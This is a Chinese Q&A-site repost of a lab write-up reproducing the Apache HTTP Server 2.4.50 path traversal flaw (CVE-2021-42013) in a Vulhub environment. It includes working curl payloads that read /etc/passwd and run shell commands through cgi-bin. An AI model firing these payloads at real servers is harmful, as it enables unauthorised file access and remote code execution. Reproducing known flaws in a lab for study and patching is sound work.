已解决
【漏洞复现】Apache_HTTP_2.4.50_路径穿越漏洞(CVE-2021-42013)
来自网友在路上 175875提问 提问时间:2023-11-06 11:53:52阅读次数: 75
最佳答案 问答题库758位专家为你答疑解惑
感谢互联网提供分享知识与智慧,在法治的社会里,请遵守有关法律法规
文章目录
- 1.1、漏洞描述
- 1.2、漏洞等级
- 1.3、影响版本
- 1.4、漏洞复现
- 1、基础环境
- 2、漏洞扫描
- 3、漏洞验证
- 方式一 curl
- 方式二 bp抓捕
- 1.5、修复建议
2.4.50漏洞描述CVE-2021-42013是由CVE-2021-41773的不完整修复导致的漏洞,攻击者可以使用路径遍历攻击将URL映射到由类似别名指令配置的目录之外的文件。修复方案升级至最新版本
1.1、漏洞描述
CVE-2021-42013是由CVE-2021-41773的不完整修复导致的漏洞,攻击者可以使用路径遍历攻击将URL映射到由类似别名指令配置的目录之外的文件
此漏洞影响Apache HTTP Server 2.4.49和2.4.50,而不影响更早版本。
1.2、漏洞等级
高危
1.3、影响版本
Apache HTTP Server 2.4.49以及2.4.50两个版本
1.4、漏洞复现
1、基础环境
Path:Vulhub/httpd/CVE-2021-42013
启动测试环境:
docker-compose build
sudo docker-compose up -d
访问http://your-ip:8080/即可看到Apache HTTP Server的It works!
2、漏洞扫描
3、漏洞验证
Apache HTTP Server 2.4.50修补了以前的CVE-2021-41773漏洞
但可以使用.%%32%65进行绕过(注意其中的/icons/必须是一个存在且可访问的目录)
方式一 curl
curl -v --path-as-is http://192.168.80.141:8080/icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd
在服务器上启用mods cgi或cgid后,此路径遍历漏洞将允许执行任意命令
curl -v --data "echo;id" 'http://192.168.80.141:8080/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh'
方式二 bp抓捕
1.5、修复建议
升级至最新版本
查看全文
99%的人还看了
相似问题
猜你感兴趣
版权申明
本文"【漏洞复现】Apache_HTTP_2.4.50_路径穿越漏洞(CVE-2021-42013)":http://eshow365.cn/6-33600-0.html 内容来自互联网,请自行判断内容的正确性。如有侵权请联系我们,立即删除!